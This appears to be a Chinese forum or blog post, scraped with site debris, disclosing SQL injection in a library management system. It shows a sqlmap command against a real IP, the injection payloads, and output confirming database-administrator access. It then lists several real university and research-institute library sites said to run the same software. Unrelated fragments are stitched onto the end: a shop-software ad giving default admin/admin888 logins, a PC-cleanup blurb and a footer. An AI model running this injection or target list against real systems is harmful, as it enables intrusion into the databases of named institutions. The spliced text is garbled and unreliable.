某通用图书馆管理系统sql注入,主要是某个某页面存在sql注射。
sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dba<br><br> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br> ---<br> Place: GET<br> Parameter: ID<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: ID=123 AND 7478=7478<br><br> Type: AND/OR time-based blind<br> Title: Oracle AND time-based blind<br> Payload: ID=123 AND 9273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111)||CHR(105)||CHR(98),5)<br> ---<br> [11:34:18] [INFO] the back-end DBMS is Oracle<br> web server operating system: Windows 2008 R2 or 7<br> web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727<br> back-end DBMS: Oracle<br> [11:34:18] [INFO] testing if current user is DBA<br> current user is DBA: True<br> [11:34:25] [INFO] fetched data logged to text files under '/Users/Leek/Desktop/sqlmap-dev/output/219.242.65.10'
DBA==True
在它的客户名单里测试了几个,
国家图书馆中央社会主义分馆:http://www.zysylib.org.cn/
中国科学院物理研究所:http://libiop.iphy.ac.cn/
中国科学院软研所:http://124124.16.136.160:8083/iscas_lib/
还有各种大学用户,
中国矿业大学:http://219.242.65.10/fsweb/Default.aspx
华东交通大学:http://lib.ecjtu.jx.cn:80/gdweb
华北科技学院:http://211.81.174.140/
使用模板与程序分离的方式构建,依靠专门设计的数据库操作类实现数据库存取,具有专有错误处理模块,通过 Email 实时报告数据库错误,除具有满足购物需要的全部功能外,成新商城购物系统还对购物系统体系做了丰富的扩展,全新设计的搜索功能,自定义成新商城购物系统代码功能代码已经全面优化,杜绝SQL注入漏洞前台测试用户名:admin密码:admin888后台管理员名:admin密码:admin888
0
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
广告Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
191
收藏
